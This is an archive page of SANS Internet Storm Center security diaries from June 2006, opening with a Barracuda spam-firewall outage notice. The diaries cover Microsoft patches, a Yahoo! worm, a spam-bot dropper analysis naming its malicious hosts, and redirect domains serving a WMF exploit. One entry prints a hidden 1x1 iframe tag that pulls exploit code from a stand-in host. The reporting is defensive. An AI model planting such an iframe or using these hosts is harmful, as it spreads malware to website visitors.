Barracuda Networks remains committed to open communications with our customer base.  This morning, we had an outage that affected a large number of Barracuda Spam Firewall customers.  The affected customers were Barracuda Spam Firewall customers employing the virus scan feature of the Barracuda Spam Firewall using virus definition 1.5.144.  The outage resolved itself with a subsequent Energize Update to virus definition 1.5.145.
Beginning at 4:53 AM PST today, a faulty virus definition was released that had an incomplete virus database (virus definition 1.5.144).  To protect our customers in the event such a circumstance occurred, the Barracuda Spam Firewall has a built in precautionary feature which automatically prevents email from being sent through in order to keep potentially infected emails from being delivered.  Any Barracuda Spam Firewall in the field that had received virus definition 1.5.144 immediately began to queue all incoming messages until the complete virus database became available.
At 7:02 AM PST, the majority of Barracuda Spam Firewalls automatically received virus definition 1.5.145 containing the complete virus database, and email began to process normally for those customers previously affected.
The cause of the incomplete virus definition has been identified and resolved, and additional measures have been put in place to prevent this issue from occuring in the future.
Due to the volume of calls to our Technical Support department during this period, we did experience a phone system malfunction which caused many customers to have to wait for longer periods of time than what they have come to expect.  We apologize for any delay or inconvenience this may have caused and feel confident that our support department is back online and ready to assist customers right away.
Thank you for your patience.  We look forward to continuing to provide all our customers with the same high quality service and support that they have come to rely on.
Barracuda Networks Support and Operations Teams"


Published: 2006-06-13

MS06-032: Source routing buffer overflow

MS06-032 - KB 917953

While Microsoft rates this as important only, we at the Internet Storm Center feel that it is very critical. It is easy to exploit this. One (spoofed) packet could allow an attacker to "own" a vulnerable system. The TCP/IP stack is vulnerable to a buffer overflow in the handling of source routed packets.

While some firewalls might protect from this, consider systems that are used on the road such as in airport, hotels, ... so they must be protected now.

  • Block packets with source routing options in the firewall. According to Microsoft "IP source route options 131 and 137" are the dangerous ones, but why would you allow source routing through your firewall anyway?
  • Personal firewall might help as well
  • Disable source routing in windows by setting a registry key (see the Microsoft bulletin for details) [highly recommended action, even if you patched already]
This vulnerability is covered in CVE-2005-2379.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-025: RRAS arbitrary code execution

MS06-025 - KB 911280

A CRITICAL vulnerability in Microsoft's Routing and Remote Access Services (RRAS). A successful exploit could allow an attacker to execute arbitrary code. In order to exploit the vulnerability remotely, an                
attacker has to be able to log in to a system first.                              
The RRAS is used to connect to Microsoft networks remotely via dial up modems. With RRAS, a user can dial up to a remote network (e.g. corporate network) and access all services on the remote network like             
connected locally. In addition, RRAS is used for various multi-protocol LAN/WAN connections via VPNs.                                                     
It is not clear how exactly the exploit would occur over a network, or what the traffic will look like. We will update this diary later once we figured it out. According to this list, RRAS uses port 1701/UDP (L2TP), 1723/TCP (PPTP), as well as protocols 47 (GRE), 51 (AH) and 50 (ESP). In particular the protocols other then TCP/UDP may not be blocked by all firewalls.                                      
For most users, the best option is to disable the service. See the bulletin on how to do this. Double check that you disabled all guest accounts or other accounts that allow connections with no or weak passwords.

Johannes Ullrich


Published: 2006-06-13

MS06-011 Updated

MS06 - 011 - KB 914798

This update was originally released in March.  Our analysis at the time is located here.

The bulletin was re-released today with a number of tweaks.  "This update has been revised to include updated registry key values for the NetBT, RemoteAccess, and TCPIP services. These values have been modified to be the same as Windows XP Service Pack 2 on Windows XP Service Pack 1 systems, and the same as Windows 2003 Service Pack 1 on Windows 2003 systems with no service pack applied. Customers are encouraged to apply this revised update for additional security from privilege elevation through the these services as described in the Vulnerability Details section of this security bulletin."

Scott Fendley - Univ of Arkansas


Published: 2006-06-13

MS06-028: PowerPoint malformed record / Remote Code Execution

MS06-028 - KB 916768

Vulnerable: Office 2000, XP, 2003 for Windows and Office v.X and Office 2004 for Mac (yes, this vulnerability is present on Mac systems)

This vulnerability affects PowerPoint documents and allows for remote code execution with the privileges of the logged in user.  A malicious PowerPoint document with a malformed record can corrupt system memory and be used to execute code.  This patch replaces MS06-010 for PowerPoint 2000.

An attacker would have to somehow convince a victim to open a malicious PowerPoint file to exploit this vulnerability (either by e-mail or web download, for instance).  If the user is logged in as administrator, an attacker would gain full control of the system.  Presumably, different malicious PowerPoint files would have to be created to exploit Windows and Mac (i.e. the same PowerPoint file would likely not be able to exploit both operating systems).

This patch is classified critical for PowerPoint 2000 only, and important for all other versions (including Mac).  This patch fixes the vulnerability detailed in CVE-2006-0022.  Users are advised to apply this patch if they use Microsoft PowerPoint.

John Bambenek -- University of Illinois


Published: 2006-06-13

MS06-024: buffer overflow in windows media player

MS06-024 - KB 917734

Windows Media player is vulnerable in it's handling of PNG images.

Microsoft rates his vulnerability as critical. It allows remote code execution.
Attack vectors of both email and web are possible through the use of .wmz files.

Workarounds will be based on content filetring in gateways, but might be below par on effectiveness if you count encrypted messages and the like as possible exploit vectors.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-027: MS Word object pointer / Remote Code Execution

MS06-027 - KB 919637

Vulnerable: Word 2000 (including Word Viewer 2003) and better and Works 2000 and better
Not Vulnerable: Word for Mac

This is a remote code execution vulnerability that uses a malformed object pointer to corrupt system memory and can be used to execute arbitrary code.  If the user logged in has administrative privileges, the exploit will run with those same privileges and could take complete system control.

In order to successfully exploit this vulnerability, an attacker would have to persuade a user to open a malicious Word document, either through e-mail or a web page.  This vulnerability is marked critical and Microsoft Office users should apply the patch immediately.

It is possible to not log in with an administrator-level account, but that would not prevent "spyware" classes of attacks.

John Bambenek -- University of Illinois


Published: 2006-06-13

Microsoft patch day

Microsoft is releasing today 12 new security bulletins:
  • MS06-021 Cumulative patch for Internet Explorer - Critical
  • MS06-022 ART image library buffer overflow - Critical
  • MS06-023 Microsoft JScript memory corruption - Critical
  • MS06-024 Windows media player - Critical
  • MS06-025 RRAS - Critical
  • MS06-026 Graphics rendering engine remote code execution - Critical
  • MS06-027 Word remote code execution - Critical
  • MS06-028 Powerpoint remote code execution -Critical
  • MS06-029 Exchange - Important
  • MS06-030 SMB privilege escalation - Important
  • MS06-031 RPC mutual authentication spoofing - Moderate
  • MS06-032 IP source routing allows remote code execution - Important
and re-released one:
Handlers actively working on these include Arrigo, John, Kyle, Lorna, Johannes, Scott and Swa.


Published: 2006-06-13

MS06-026: Graphics Rendering Engine / Remote Code Execution

MS06 - 026 - KB 918547

** This vulnerability ONLY applies to Windows 98, 98SE, and ME (We aren't still running these, are we?).  Windows 2000, XP and beyond are not vulnerable **

This is a critical vulnerability in the Graphics Rednering Engine that allows remote code execution of the target system using specifically crafted WMF files.  When successfully exploited, the target system can be completely compromised.  This is a new vulnerability not associated with the WMF vulnerabilities from earlier this year.  An attacker can exploit this vulnerability by using a specifically crafted webpage (and getting the victim to view that page) or by sending an exploit in email (where the email reader renders images).

If you are running Windows 98, 98SE, or ME, you should upgrade your operating system to Windows 2000, XP or later.  If you cannot upgrade, this patch should be installed immediately.

John Bambenek -- University of Illinois


Published: 2006-06-13

MS06-023: Microsoft's JScript remote code execution

MS06-023 - KB 917344

A problem in JScript where it releases memory too soon can cause memory corruption and lead to remoee code execution.

The attack vector is web based where visiting malicious contant is sufficint to exploit the browser. This is strongly linked with MS06-021 and Microsoft recommends to install both at the same time.

Obviously it's better not to log in with administrative rights as it makes the impact of these vulnerabilities a lot worse.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-022: buffer overflow in ART image rendering library

MS06-022 - KB 918439

ART is an image file format (yep, image formats are still popular reasearch topics for hackers it seems). The format is used by AOL.

The impact of this is that users logged in with administrative rights can be exploited with remote code execution.

Microsoft rates this vulnerability as critical.

The patch removes support for ART image files from MSIE, as such they will not be rendered any longer.

It's interesting to note that the image library is an optional install on windows 2000.

  • Do not login as administrator or with an account with administative rights, it's dangerous.
  • Consider switching to an alternative browser, they work really well and it makes the lives of the hackers harder is not all of us use the same browser with the same vulnerabilities.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-021: Internet Explorer patch

MS06-021 - KB 916281

Fixes memory corruption that can lead to remote code execution, disclosure of sensitive information and creation of additional accounts on the host operating system.

Microsoft rates this patch as critical and considering an impact of remote code execution in the client system, for a browser we woould rate such a thing as very critical.

Microsoft claims the attack vector has to be web based, the use of it through outlook should not be possible.

Please note that this patch affects the issues in kb 917425 by terminating the compatibility period.

This includes a fix for publicly known bugs: CSS cross domain information disclosure (CVE-2005-4089) and  address bar spoofing (CVE-2006-1626).

Swa Frantzen -- section 66


Published: 2006-06-13

Javascript/AJAX/Worm Like Behavior

We have seen the Yamanner worm spread throughout Yahoo over the past few days.  This worm manages to spread without the user doing anything other than viewing a malicious email.  Yahoo to its credit had already
fixed the exploit in it's new beta client.

Software developers, and webmasters alike should take this as a warning, new exploits will be coming that will use javascript and Ajax-like behavior to spread.  The current worm could be readily modified to spread across many systems that do not escape javascript when displaying data from a foreign source. Many web developers should reexamine their code, and make sure that display functions do not deliver potentially malicious code.

After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code can protect developers against this type of exploit.

We will be sending notice to affected software vendors that we have identified at this time, however we currently do not have plans to publish specific applications until new releases/patches are available.


Published: 2006-06-12

Yahoo! mass-mailer

A Yahoo! mass-mailer is currently making the rounds with a subject of "New Graphic site".

It was first reported to the ISC at 12:32 UTC and now appears to be circulating in two slightly different variants.  Analysis by Lorna and myself shows that both variants are flawed therefore they spread very effectively but do not actually perform the intended action.  The mass-mailer attempts to open a browser window to www.lastdata.com but a spelling mistake prevents this from working.  The website appears to be dormant and rejecting accesses.

The release of a new version barely two hours after we started our analysis which partially fixes the first version indicates that the code is very much under development and you should assume that the remaining bugs will be rapidly ironed out.

To activate the mass-mailer it is sufficient to open the mail message without clicking on the attachment and it will scour your address list and send itself as an attachment (forwarded message) to everyone on it.  It searches for both @yahoo.com and @yahoogroups.com e-mail addresses.

There is currently no trivial fix for Yahoo! mail as turning off Javascript on the browser will prevent you from reading your e-mail.  For Yahoo! groups it is recommended that moderators/adminstrators turn off attachments for the time being to prevent this spreading further.


Published: 2006-06-12

SANSFIRE: Internet Storm Center Training Event

In case you missed it: Its only one month until the start of SANSFIRE! SANSFIRE will be your best opportunity to meet various handlers (about 15 will attend) and learn about what they are involved in at the ISC. In addition to a large number of training classes (18 week long classes, 13 1&2 day classes) we got a number of exciting evening talks scheduled. So if you are interested: This is the week to get your boss's approval and setup your travel plans.

SANSFIRE will run from July 5th-13th in Washington DC. (great oportunity to arrive on the 4th and watch the fireworks). For details, see the course overview and the SANS@Night schedule as well as the special event schedule.


Published: 2006-06-10

Microsoft Upcoming Bulletins Release

In the recent Microsoft Security Bulletin Advance Notification release, Microsoft has announced to release several security updates in the upcoming security bulletin release cycle (13 Jun 06). These include:

1) Nine Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical.

Prior to the release of the bulletins, Microsoft encourages administrators to review the following articles and take appropriate steps for their environment:
Microsoft Security Advisory 912945 (Non-Security Update for Internet Explorer)
Microsoft Knowledge Base Article 912945 (Internet Explorer ActiveX update)
Microsoft Knowledge Base Article 917425 (Internet Explorer ActiveX compatibility patch for Mshtml.dll)
Information for Developers about Internet Explorer

Accordingly to Microsoft, users who apply the security update will receive the ActiveX update regardless of whether they have applied the compatibility patch.

2) One Microsoft Security Bulletin affecting Microsoft Exchange. The highest Maximum Severity rating for this is Important.

As the update will include the functionality change (Microsoft Knowledge Base Article 912918 - Users cannot send e-mail messages from a mobile device or from a shared mailbox in Exchange 2000 Server and in Exchange Server 2003), administrators are urged to review the Knowledge Base article prior to release and take steps appropriate for their environment.

3) Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical.

4) One non-security High-Priority Updates for Windows on Windows Update (WU) and Software Update Services (SUS).

5) Two non-security High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).

6) An updated version of the Microsoft Windows Malicious Software Removal Tool.


Published: 2006-06-09

MS06-015 will not provide patch for windows 98 and ME.

    Microsoft announced that they will not provide a patch for Windows 98 and ME for MS06-015 "Vulnerability in Windows Explorer Could Allow Remote Code Execution (908531)".  The choice appears to be related to the amount of effort needed to patch the problem and the fact that those Operating systems reach the end of their lifecycle on June 11th.
    The suggested workaround is blocking incoming traffic to TCP port 139 on any unpatched systems.  This should at best be a temporary step; unsupported operating systems are a greater liability than supported ones.
    Many thanks to everyone that sent us a pointer to this story.

    More details can be found at:


Published: 2006-06-09

Ethereal becomes Wireshark

A few readers wrote to us about Ethereal becoming Wireshark. The packet analyzer is widely used by network and security professionals. Sounds like Gerald Combs, the developer of Ethereal is joining CACE Technologies, the creator of WinPcap, hopefully, this will make things better for both products. Wireshark can now be found at http://www.wireshark.org/


Published: 2006-06-09

WinGate Update

As we reported on June 7th, there is a vulnerability with working exploit in QBik Wingate.  The exploit says it's for "QBik Wingate version remote exploit for Win2k SP4 (german)". 

Melvin wrote to let us know that an updated version (6.1.3) is now available from http://www.wingate.com/download.php.

Thanks, Melvin!


Published: 2006-06-09

Numbers Spam Solved

The source of the 'Numbers Spam' has been publically revealed.    It's a variant of the Bagel/Beagle/Toosoo/... virus.   Symantec is calling it "Beagle.FC".     Many thanks to everyone who sent in their thoughts about this one.


Published: 2006-06-07

phpBB 2.0.21

phpBB version 2.0.21 was released.
There are some minor security improvements in the code, check the announcement for more details. Most of the code changes apear to be more functionality oriented than security oriented.

Considering the level of attention phpBB gets from the bad guys out there, it's best not to hesitate for long and upgrade really soon.

Swa Frantzen - Section 66


Published: 2006-06-07

WinGate HTTP proxy vulnerability, remote DoS & Code Execution

There was a vuln/exploit announcement on FD today for QBik Wingate, the exploit says it's for "QBik Wingate version remote exploit for Win2k SP4 (german)".

Information is available here;

ISS rates this High Risk
WinGate HTTP proxy buffer overflow

Secunia - WinGate WWW Proxy Server Buffer Overflow Vulnerability

I do not see patch information available at this time.


Published: 2006-06-06

A malware jungle


We got an interesting piece of malware from one of our readers, Robert. Robert detected one of his systems trying to connect to port 25 on various servers around the world. As this immediately screams: spam bot, Robert decided to analyze the box further.

He captured some packets (you know that we at ISC love to analyze network traffic) and found an interesting binary that he submitted to us for analysis


55e30602f27fa4272c3bd2dd9d701224  extdrvr.exe

Received results for file: extdrvr.exe
Antivirus               Version            Last update    Result
AntiVir                 06.06.2006    no virus found
Authentium              4.93.8             06.06.2006    no virus found
Avast                   4.7.844.0          06.06.2006    no virus found
AVG                     386                06.06.2006    no virus found
BitDefender             7.2                06.06.2006    no virus found
CAT-QuickHeal           8.00               06.06.2006    no virus found
ClamAV                  devel-20060426     06.06.2006    no virus found
DrWeb                    4.33              06.06.2006    no virus found
eTrust-InoculateIT      23.72.29           06.06.2006    no virus found
eTrust-Vet              12.6.2244          06.06.2006    no virus found
Ewido                   3.5                06.06.2006    no virus found
Fortinet                 06.06.2006    no virus found
F-Prot                  3.16f              06.06.2006    no virus found
Ikarus                   06.06.2006    no virus found
Kaspersky                06.06.2006    no virus found
McAfee                  4778               06.06.2006    no virus found
Microsoft               1.1441             06.07.2006    no virus found
NOD32v2                 1.1582             06.06.2006    no virus found
Norman                  5.90.17            06.06.2006    no virus found
Panda                     06.06.2006    Suspicious file
Sophos                  4.05.0             06.06.2006    no virus found
Symantec                8.0                06.06.2006    no virus found
TheHacker               06.05.2006    no virus found
UNA                     1.83               06.06.2006    no virus found
VBA32                   3.11.0             06.06.2006    no virus found

After we analyzed this binary, we discovered a malware jungle. So, this is what's happening:

extdrvr.exe is a spam bot that Robert detected. This malware is particularly nasty as, at the moment when we were writing this diary, just one of the 26 anti-virus programs on VirusTotal finding it suspicious.
When executed, the spam bot connects to spm.freecj.com and asks for the list of e-mail addresses to send spam to, together with the e-mail body. Immediately after this is downloaded, it will try sending the spam.

But that's not all. The malware also downloads other Trojan downloaders which, in turn, download other stuff.

First downloader that the main spam bot downloads is[REMOVED]/d1.html. This downloader will in turn download a pretty nasty dialer (so, making money *is* behind all this), from a well known malware network (that some of you probably already filtered):[REMOVED].exe.
The dialer will make itself persistent across reboots and will make services RasMan and TapiSrv automatically start at boot.
The dialer will also get the number it should call from[REMOVED]/getnumtemp.asp?nip=0.

0815205b98f2449de6db9b89cfae6f24  d1.html
3a62b9180ae98b9ad32980d0fbe1aa72  [REMOVED].exe

If this wasn't enough, prepare for more. The dialer will now download another downloader (are we getting lost in all this?),[REMOVED]. We're not completely sure what this downloader does, as it will download about 14kb of data from various sites, but this data seems to be encrypted. When we get more information about this, we'll update the diary.

1083e1401bc49ff8c167e912a3555c20  [REMOVED]

Back to the spam bot. What's interesting is that it will download and replace the machine's hosts file. Big deal, we've seen that a million times. Among all the standard AV vendors' web sites, and Microsoft Windows Update, the newly downloaded hosts file prevents user from visiting about 50 .biz sites, well known for spreading malware (for example, www.iframebiz.biz, www.toolbarbiz.biz, etc.). Trying to eliminate the competition here?


As always learning lessons is the most important part of handling incidents. Anti-virus doesn't do much for you when the malware is not detected obviously. So we should learn not to place all our trust in that channel for detecting malware. Robert detected this piece of malware through an IDS and correlation of logs. Monitoring your outgoing traffic, even in the absense of an IDS could do this trick. Looking for spikes in outgoing email is a good way to detect unexpected spam bots such as these. The blocking of the traditional sites using a hosts file is also a good thing to build monitoring for. If it gets used you know there's something going on and a second look wil be well spent effort.

Removal? Well once you deal with dozens of pieces of malware embedding itself left and right your luck in getting it off painlessly ran out.

Finding all that went wrong is very hard as you might be looking at malware being pulled in that changes in between the machine got it and you go and get it again, potentially changing (thus invalidating) much of the results.

Proactively keeping all systems up to date is good and helps, but making sure the really secret stuff cannot reside or even be consulted from a machine connected somehow to the Internet is a good step as well. A good place to build this is in a data classification (actually handling) policy. Define the most critical information assets and isolate them.

At this point we have not identified the intial infection vector yet.

Bojan Zdrnja
Swa Frantzen


Published: 2006-06-06


GD is a graphical library often used to create or manipulate images on the fly in websites.

Details about a vulnerability (and exploit) have been released on full disclosure that claim to cause the library to run an infinite loop while decoding crafted images. It's clear that when used this will lead to severely degraded performance of webservers.

No patch available so far, monitor http://www.boutell.com/gd/ if you use it in a vulnerable fashion.

Thanks Jim!

Swa Frantzen - Section 66


Published: 2006-06-06

javascript file upload entry

A full disclosure post today had an exploit that used javascript in browsers to selectively "steal" keystrokes from the user typing and channeling it into the file upload field.  So as long as you type enough they could make you as well type the filename they were after.

While this attack needs more to become a bit effective (like making the user type the needed letters), it does show the dangers of running javascript once again. Your best choice if you use e.g. FireFox is to use something like Noscript. It allows you to turn javascript off by default and turn it on as needed for selected sites (those where the webmaster doesn't care for users not wanting to expose themselves to randomly downloaded executable content)

Aparently both Firefox and MSIE suffer from this.

Swa Frantzen - Section66


Published: 2006-06-06

Spamassassin - upgrade

Before you write us: nope, this is unlikely to be related to the "spam spam spam" article I wrote earlier.

Spamassassin has 2 new releases out. They fix vulnerabilities that -given specific command line options- opens up spamassassin to remote command execution as the user spamassassin is running as.

Solution: upgrade to version 3.06 or 3.1.3 as soon as possible or do not use the vulnerable command line combination (aparently both "--vpopmail" and "-P" (paranoid) need to be turned on) as a workaround.

Thanks to fellow handlers Jim and Patrick.

If you do take the time to upgrade, I'd suggest to make sure you run it as a user that has hardly any rights  and/or chroot it.

Swa Frantzen - Section 66


Published: 2006-06-06

Spam - spam - spam

A new twist in spammer tactics is being reported, although we're not sure what their goal is at the moment.

Users report receiving messages apearing to originate from themselves, with only numbers as subject and body.

The body does apears to be HTML encoded, but it's so basic as to not pose a threat so far.

It would be a good idea to investigate if you can drop email that apears to be from your own organization while originating outside of it. If your users do not send such email (e.g. because they use a VPN to connect back to the inside while on the road), dropping that email might cut down on a few spams.

Some fun while on this subject - it's a Tuesday after a 3 day weekend in some countries - :
All relations to the SPAM luncheon meat product are purely accidental, even if it was inspired on a 1975 sketch from Monty Python. Most of us think spam started back in 1994 when two lawyers advertized their green card scam in each and every usenet newsgroup. Some digging around revealed much earlier attempts in 1978 on the precursor to the modern Internet. It just goes to show you're never around for too long to learn something new.

Swa Frantzen - Section 66


Published: 2006-06-05

Farewell 6Bone

After 10 years, today (6/6/06, yes, I'm not going to make any snide remarks about the date), the experimental IPv6 network 6Bone is going dark.  There is now enough real IPv6 infrastructure that the venerable 6Bone is no longer necessary.

Jim Clausing, jclausing at isc dot sans dot org


Published: 2006-06-05

Snort URL evasion vulnerability patched and version 2.6.0 available

The Snort NIDS (http://www.snort.org) vulnerability that was discussed last week (http://isc.sans.org/diary.php?storyid=1373) has been addressed by the Snort team. The latest version, 2.4.5, fixes two vulnerabilites what might have allowed an attacker to send malicious web requests undetected by Snort. Get it at snort.org.

Late breaking news flash! Snort 2.6.0 is out. According to Jennifer Steffens of Sourcefire, the new release includes:
  • Tcp stream properly reassembled after failed sequence check, which may lead to possible detection evasion.
  • Added configurable stream flushpoints.
  • Improved rpc processing.
  • Improved portscan detection.
  • Improved http request processing and handling of possible evasion cases.
  • Improved performance monitoring.
There is also dynamic rules processing and a new version numbering scheme. http://www.snort.org/pub-bin/snortnews.cgi


Published: 2006-06-05

Windows Alternate Data Streams Revisited

An oldie but goodie has reared its familiar head, this time in the manner of a posting to Bugtraq and Full Disclosure lists. Windows NTFS supports multiple streams of data for any given file (http://support.microsoft.com/kb/105763). While the functions that access ADSs are clearly defined by Microsoft, very few Windows tools can view these alternate data strams (ADS) without some added help. In addition, many third-party sotware developers ignore the possible presence of ADSs, thus providing a wonderful storage location for malicious code.

The Bugtraq posting http://www.securityfocus.com/archive/1/435962/30/0/threaded mentions a few antivirus tools that fail to detect known malware when stored as ADSs. The Internet Storm Center has not tested any of these claims, but we have no reason to dispute them as we have seen this time and time again.

Ryan Means wrote an excellent paper (GCFW honors) that discusses Alternate Data Streams in depth, presents a number of tools to locate and manipulate ADSs, and presents an extension to Windows Explorer to directly report the presence of ADSs. You can pull it from the SANS Reading Room at: http://www.sans.org/rr/whitepapers/honors/1503.php


Published: 2006-06-04

Hidden IFrame Remains Popular With Browse-By Exploit Authors

ISC reader Glenn Jarvis wrote in to tell us about a website that installs a malicious executable in the temporary folder of the victim's system. A look at the source code of the website's top page revealed a tiny IFrame tag that retrieved another page from a remote server. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:

<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>

The remote server's index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer. The executable was recognized by about half of anti-virus tools as a spyware trojan, and was assigned names such as Downloader-ASQ, TR/Spy.Small.EE.2, Win32/SillyDL.2fy, Trojan.Spy.Win32.Small, and Downloader.

The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:

Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)

A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
  • Initialize and script ActiveX controls not marked as safe for scripting
  • Access data sources across domains
The exploit we observed operates by instantiating a series of objects, including Microsoft.XMLHTTP, Adodb.Stream, and WScript.Shell. When looking for correlating activities related to this exploit, we came across web forum discussions that suggest that this exploited existed as early as April 26th, two weeks after the release of Microsoft's patch.

Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-06-03

Non-standard Incident Prediction

We are all familiar with the use of firewall logs, intrusion detection alerts, antivirus warnings, and watching for "funny" entries in our system logs as ways to indicate that somebody on the Internet is up to no good.  But those traditional detection systems don't do any good against attacks that are not oriented on one of the traditional seven layers of the OSI model.

For example, consider what we witnessed last year following the Katrina and Rita hurricanes that struck the southern coast of the USA.  Within 24 hours of landfall, the Internet Storm Center observed a dramatic increase in fraudulent web sites aimed at good-hearted people wanting to donate to charities or relief efforts.  We can predict with fairly high certainty that the same thing is going to happen again this year.  We are monitoring DNS registrations and have seen several new names appear in the last few weeks with the strings "alberto", "beryl", "donation", or "hurricane" in them.  (Alberto and Beryl are the first two names on the list for 2006.)  Are they all legitimate?  Well, let's see what happens as soon as the first storm forms and makes landfall.

In fact, one of our observant readers (thanks, George!) wrote us to say, "I work in a government research lab with a very diverse user population, including many soccer fans.  The last World Cup led to a malware spike.  I expect another spike this year, but with a potential for more sophisticated attacks."  So George is keeping an eye out for a potential rise in malware attacks, basing his prediction on the fact that during the World Cup many fraudsters and pranksters will likely launch specially crafted emails and set up bogus web sites designed to lure in sports fans around the world.

It's important to recognize that a large percentage of today's Internet attacks are oriented on fraud and criminal activity, and that the criminals will use any event or circumstance to "hack layer eight" as I like to say when I teach SANS Security Essentials.  (Layer eight is the "carbon layer" that sits on top of layer seven, application.)

So what are you doing to protect your layer eight from future incidents?  Do you have early warning and detection devices in place?  Are you educating your users and arming them to defend themselves and your networks against con-jobs aimed directly at them?  Do you have not just good, but GREAT, organizational policy in place?  Remember, the first step in incident handling is Preparation, and the time to start preparing is now.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-06-03

News From Microsoft

Microsoft issued additional information on the Word vulnerability.  The patch is still scheduled for release on Tuesday, June 13.

Thanks, David, for bringing this to our attention.


Published: 2006-06-02

Firefox and Thunderbird released

Versions of both Thunderbird and Firefox were released by the Mozilla Corporation today.  The release notes state that each contained "several security fixes", but the known vulnerabilities page hasn't been updated yet, so we don't know exactly what they are.

Jim Clausing, jac --at-- isc dot sans dot org


Published: 2006-06-01

Something new on Telnet?

We just got a report about a massive scans for Telnet (port 23).
Checking on Dshield ,something is odd there too...
My question is, are you observing something different on your IDS/FW logs on this port?

Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org)


Published: 2006-06-01

Invision Board being exploited

On May 21st we reported a vulnerability in Invision Power Board. To be honest I didnt know much about it, or about the amount of sites using it. Well, now I know at least a BIG one that was using it as a forum for its customers. We are still contacting the website owner, so I wont mention it here. But the case is that it was vulnerable and was exploited.
Now, when you visit it, it will try to push a .wmf exploit to you.

The iframes on that page were reditecting to HTTP : //  traffweb1.biz/dl/adv771.php and HTTP :   // 2-extreme.biz/traff.php?adv=54 .

Those websites, were redirecting to HTTP : //  and HTTP : // .

Which would try to push the .WMF exploit to you...

Fortunately, all AV vendors at Virustotal recognize the exploit, and at least McAfee and Symantec will trigger an alert when you are visiting this forum page.

Handler on Duty: Pedro Bueno ( pbueno /&&/ isc. sans. org )


Published: 2006-06-01

F-Secure web console buffer overflow

The folks at F-Secure issued a bulletin today highlighting a buffer overflow in the web console feature of F-Secure Anti-Virus for Microsoft Exchange and F-Secure Internet Gatekeeper.  F-Secure rates this vulnerability as high in the cases where the web console is configured to only allow connections from localhost or specific trusted hosts and critical if configured to allow connections from all hosts.  They have released patches, the table below is taken directly from their advisory.

Patch availability:
Product Versions Hotfix ID Download
F-Secure Anti-Virus for Microsoft Exchange 6.40 Apply hotfix for F-Secure Anti-Virus for Microsoft Exchange 6.40:
F-Secure Internet Gatekeeper 6.50 Upgrade to F-Secure Internet Gatekeeper 6.60
Apply hotfix for the F-Secure Internet Gatekeeper 6.50:
F-Secure Internet Gatekeeper 6.42, 6.41, 6.40 Upgrade to F-Secure Internet Gatekeeper 6.60

Jim Clausing, jclausing /at\ isc dot sans dot org


Published: 2006-06-01

Snort bypass vulnerability

Update: (2006-06-01 16:10 UTC) Sourcefiree/snort.org has issued their statement on the issue (patches coming Monday, 5 June):

Demarc just released a vulnerability alert on Snort. The vulnerability leads to evasion of URI content rules. When a carriage return is added to the end of a URL (before HTTP protocol declaration), Snort detection can be evaded. According to the alert, this vulnerability will affect thousands of detection rules in the standard rule base. No need to panic at the moment though, as the folks at Sourcefire have fixed this in version 2.6.0 and we haven't seen this kind of traffic in the wild yet. Thanks to Blake Hartstein for reporting this to us.  Also, thanks to our friends at Sourcefire for info on the extent of the problem and about the upcoming patch.

Please refer to the vulnerability alert for more details,


Published: 2006-06-01

More on Symantec vulnerabilities

The latest patches from Symantec are causing quite a bit of confusion. To reiterate again what Kevin wrote in his diary (http://isc.sans.org/diary.php?storyid=1368):

*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.

Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):

Symantec Antivirus Corporate Edition -> (there's a typo here on their web, it's not version 3) -> -> ->

Symantec Client Security -> -> -> ->

Now, if you are running *ANY* other version that is affected, you will have to first upgrade to one of the versions that have the patch out and then install the patch. I hope this will clear the confusion.

There seem to be some mitigations to the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, will have the service Rtvscan.exe listening on TCP port 2967. In case that your host based firewall is configured to block access to this port (effectively meaning that you can't manage the client from the centralized server, at least not until the client connects to it) you should be ok.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners so it looks like it's safe, at least from a remote exploit over the network (patch in any case!).

If we get more information we'll update the diary. Thanks to Gary for help with this.


Symantec finally posted a nice web page with details what you have to do regarding the version you're running at http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248.